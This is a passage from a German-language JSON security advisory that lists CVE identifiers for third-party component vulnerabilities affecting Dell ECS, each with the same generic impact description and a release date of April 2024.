"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-37436"
},
{
"cve": "CVE-2022-37865",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-37865"
},
{
"cve": "CVE-2022-37866",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-37866"
},
{
"cve": "CVE-2022-38090",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38090"
},
{
"cve": "CVE-2022-38096",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38096"
},
{
"cve": "CVE-2022-38126",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38126"
},
{
"cve": "CVE-2022-38127",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38127"
},
{
"cve": "CVE-2022-38177",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38177"
},
{
"cve": "CVE-2022-38178",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38178"
},
{
"cve": "CVE-2022-3821",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3821"
},
{
"cve": "CVE-2022-38533",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38533"
},
{
"cve": "CVE-2022-38749",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38749"
},
{
"cve": "CVE-2022-38750",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38750"
},
{
"cve": "CVE-2022-38751",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38751"
},
{
"cve": "CVE-2022-38752",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-38752"
},
{
"cve": "CVE-2022-39028",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-39028"
},
{
"cve": "CVE-2022-3903",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3903"
},
{
"cve": "CVE-2022-39188",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-39188"
},
{
"cve": "CVE-2022-39399",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-39399"
},
{
"cve": "CVE-2022-3970",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-3970"
},
{
"cve": "CVE-2022-40149",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40149"
},
{
"cve": "CVE-2022-40150",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40150"
},
{
"cve": "CVE-2022-40151",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40151"
},
{
"cve": "CVE-2022-40152",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40152"
},
{
"cve": "CVE-2022-40153",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40153"
},
{
"cve": "CVE-2022-40303",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40303"
},
{
"cve": "CVE-2022-40304",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40304"
},
{
"cve": "CVE-2022-40307",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40307"
},
{
"cve": "CVE-2022-40674",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40674"
},
{
"cve": "CVE-2022-40768",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40768"
},
{
"cve": "CVE-2022-40899",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-40899"
},
{
"cve": "CVE-2022-4095",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4095"
},
{
"cve": "CVE-2022-41218",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41218"
},
{
"cve": "CVE-2022-4129",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4129"
},
{
"cve": "CVE-2022-4141",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-4141"
},
{
"cve": "CVE-2022-41717",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41717"
},
{
"cve": "CVE-2022-41721",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41721"
},
{
"cve": "CVE-2022-41848",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41848"
},
{
"cve": "CVE-2022-41850",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41850"
},
{
"cve": "CVE-2022-41854",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41854"
},
{
"cve": "CVE-2022-41858",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41858"
},
{
"cve": "CVE-2022-41881",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41881"
},
{
"cve": "CVE-2022-41903",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41903"
},
{
"cve": "CVE-2022-41915",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41915"
},
{
"cve": "CVE-2022-41966",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-41966"
},
{
"cve": "CVE-2022-41974",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
